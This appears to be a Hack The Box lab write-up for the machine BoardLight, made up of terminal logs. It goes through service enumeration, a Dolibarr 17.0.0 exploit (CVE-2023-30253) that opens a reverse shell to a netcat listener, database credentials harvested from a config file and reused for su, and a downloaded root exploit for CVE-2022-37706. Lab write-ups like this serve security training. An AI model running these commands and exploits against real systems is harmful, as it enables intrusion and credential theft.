HTB BoardLight done
BoardLight
OS:
Linux
Technology:
JQuery[3.4.1]
Dolibarr 17.0.0
IP Address:
10.10.11.11
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Users and pass:
Login to website: http://crm.board.htb/index.php
L: admin
P: admin
---
From file: ./crm.board.htb/htdocs/conf/conf.php
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
---
SSH login for user: larissa
L: larissa
P: serverfun2$2023!!
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.11.11_nmap 10.10.11.11 ; cat 10.10.11.11_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-12 11:08 UTC
Nmap scan report for 10.10.11.11
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ cat /etc/hosts | grep board
10.10.11.11 board.htb
Ffuz - http://board.htb
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ ffuf -u http://board.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o board.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://board.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : board.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
about.php [Status: 200, Size: 9100, Words: 3084, Lines: 281, Duration: 35ms]
contact.php [Status: 200, Size: 9426, Words: 3295, Lines: 295, Duration: 39ms]
css [Status: 301, Size: 304, Words: 20, Lines: 10, Duration: 42ms]
[INFO] Adding a new job to the queue: http://board.htb/css/FUZZ
do.php [Status: 200, Size: 9209, Words: 3173, Lines: 295, Duration: 59ms]
images [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 36ms]
[INFO] Adding a new job to the queue: http://board.htb/images/FUZZ
index.php [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 40ms]
js [Status: 301, Size: 303, Words: 20, Lines: 10, Duration: 36ms]
[INFO] Adding a new job to the queue: http://board.htb/js/FUZZ
[INFO] Starting queued job on target: http://board.htb/css/FUZZ
[INFO] Starting queued job on target: http://board.htb/images/FUZZ
[INFO] Starting queued job on target: http://board.htb/js/FUZZ
:: Progress: [122814/122814] :: Job [4/4] :: 1069 req/sec :: Duration: [0:01:55] :: Errors: 0 ::
Ffuz subdomain - http://FUZZ.board.htb
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ ffuf -u http://board.htb -H "Host: FUZZ.board.htb" -c -w /usr/share/wordlists/dirb/big.txt | grep -v "15949" | tee board.htb_subdomain_ffuz
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://board.htb
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [20469/20469] :: Job [1/1] :: 368 req/sec :: Duration: [0:00:54] :: Errors: 0 ::
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 61ms]
Add a new subdomain to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ cat /etc/hosts | grep crm
10.10.11.11 board.htb crm.board.htb
Open website: http://crm.board.htb
I found software
Dolibarr 17.0.0
I guess default creds:
L: admin
P: admin
Exploit: POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)
[POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)](https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253)
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git
Cloning into 'Exploit-for-Dolibarr-17.0.0-CVE-2023-30253'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 18 (delta 3), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 9.17 KiB | 2.29 MiB/s, done.
Resolving deltas: 100% (3/3), done.
Run exploit - revshell
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.11.11] 52260
bash: cannot set terminal process group (889): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_BoardLight/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253]
└─$ python3 exploit.py http://crm.board.htb admin admin 10.10.14.25 80
[*] Trying authentication...
[**] Login: admin
[**] Password: admin
[*] Trying created site...
[*] Trying created page...
[*] Trying editing page and call reverse shell... Press Ctrl+C after successful connection
Find creds in file : ./crm.board.htb/htdocs/conf/conf.php
I found creds for mysql:
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
---
www-data@boardlight:~/html$ find . -name "conf.php" 2>/dev/null
find . -name "conf.php" 2>/dev/null
./crm.board.htb/htdocs/conf/conf.php
www-data@boardlight:~/html$ cat ./crm.board.htb/htdocs/conf/conf.php
cat ./crm.board.htb/htdocs/conf/conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';
//$dolibarr_main_demo='autologin,autopass';
// Security settings
$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_main_restrict_os_commands='mysqldump, mysql, pg_dump, pgrestore';
$dolibarr_nocsrfcheck='0';
$dolibarr_main_instance_unique_id='ef9a8f59524328e3c36894a9ff0562b5';
$dolibarr_mailing_limit_sendbyweb='0';
$dolibarr_mailing_limit_sendbycli='0';
//$dolibarr_lib_FPDF_PATH='';
//$dolibarr_lib_TCPDF_PATH='';
//$dolibarr_lib_FPDI_PATH='';
//$dolibarr_lib_TCPDI_PATH='';
//$dolibarr_lib_GEOIP_PATH='';
//$dolibarr_lib_NUSOAP_PATH='';
//$dolibarr_lib_ODTPHP_PATH='';
//$dolibarr_lib_ODTPHP_PATHTOPCLZIP='';
//$dolibarr_js_CKEDITOR='';
//$dolibarr_js_JQUERY='';
//$dolibarr_js_JQUERY_UI='';
//$dolibarr_font_DOL_DEFAULT_TTF='';
//$dolibarr_font_DOL_DEFAULT_TTF_BOLD='';
$dolibarr_main_distrib='standard';
www-data@boardlight:~/html$
SSH login as user: larissa
www-data@boardlight:~/html$ su larissa
su larissa
Password: serverfun2$2023!!
larissa@boardlight:/var/www/html$ find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/larissa/user.txt
larissa@boardlight:/var/www/html$
Read flag: user.txt
larissa@boardlight:/var/www/html$ find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/larissa/user.txt
larissa@boardlight:/var/www/html$
larissa@boardlight:/var/www/html$ cd /home/larissa/
cd /home/larissa/
larissa@boardlight:~$ ls -la
ls -la
total 76
drwxr-x--- 15 larissa larissa 4096 May 17 01:04 .
drwxr-xr-x 3 root root 4096 May 17 01:04 ..
lrwxrwxrwx 1 root root 9 Sep 18 2023 .bash_history -> /dev/null
-rw-r--r-- 1 larissa larissa 220 Sep 17 2023 .bash_logout
-rw-r--r-- 1 larissa larissa 3771 Sep 17 2023 .bashrc
drwx------ 2 larissa larissa 4096 May 17 01:04 .cache
drwx------ 12 larissa larissa 4096 May 17 01:04 .config
drwxr-xr-x 2 larissa larissa 4096 May 17 01:04 Desktop
drwxr-xr-x 2 larissa larissa 4096 May 17 01:04 Documents
drwxr-xr-x 3 larissa larissa 4096 May 17 01:04 Downloads
drwxr-xr-x 3 larissa larissa 4096 May 17 01:04 .local
drwxr-xr-x 2 larissa larissa 4096 May 17 01:04 Music
lrwxrwxrwx 1 larissa larissa 9 Sep 18 2023 .mysql_history -> /dev/null
drwxr-xr-x 2 larissa larissa 4096 May 17 01:04 Pictures
-rw-r--r-- 1 larissa larissa 807 Sep 17 2023 .profile
drwxr-xr-x 2 larissa larissa 4096 May 17 01:04 Public
drwx------ 2 larissa larissa 4096 May 17 01:04 .run
drwx------ 2 larissa larissa 4096 May 17 01:04 .ssh
drwxr-xr-x 2 larissa larissa 4096 May 17 01:04 Templates
-rw-r----- 1 root larissa 33 Aug 12 04:06 user.txt
drwxr-xr-x 2 larissa larissa 4096 May 17 01:04 Videos
larissa@boardlight:~$ cat user.txt ; id ; ip a
cat user.txt ; id ; ip a
f3b8aaaff5d1fa279308ff039f57c8fd
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:30:6d brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.11/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:306d/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:fe94:306d/64 scope link
valid_lft forever preferred_lft forever
larissa@boardlight:~$
Privilege Escalation
Exploit: CVE-2022-37706-LPE-exploit
[CVE-2022-37706-LPE-exploit](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/blob/main/exploit.sh)
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ wget https://raw.githubusercontent.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/main/exploit.sh
--2024-08-13 22:24:42-- https://raw.githubusercontent.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/main/exploit.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.109.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 709 [text/plain]
Saving to: ‘exploit.sh’
exploit.sh 100%[==============================================>] 709 --.-KB/s in 0s
2024-08-13 22:24:42 (52.1 MB/s) - ‘exploit.sh’ saved [709/709]
Run exploit
* Upload exploit to remote host
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_BoardLight]
└─$ scp exploit.sh [email protected]:/tmp/
[email protected]'s password:
exploit.sh 100% 710 18.1KB/s 00:00
---
larissa@boardlight:/tmp$ chmod a+x exploit.sh
larissa@boardlight:/tmp$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
#
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
Read flag: root.txt
# cd /root
#
# ls -a
. .. .bash_history .bashrc .cache .config .dbus .local .mysql_history .profile .run root.txt snap
#
# cat root.txt ; id ; ip a
3cc67d81fa7a4f2d3b3357ff1db64c51
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:30:6d brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.11/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:306d/64 scope global dynamic mngtmpaddr
valid_lft 86391sec preferred_lft 14391sec
inet6 fe80::250:56ff:fe94:306d/64 scope link
valid_lft forever preferred_lft forever
#
References
[POC exploit for Dolibarr <= 17.0.0 (CVE-2023-30253)](https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253)
[CVE-2022-37706-LPE-exploit](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/blob/main/exploit.sh)
Lessons Learned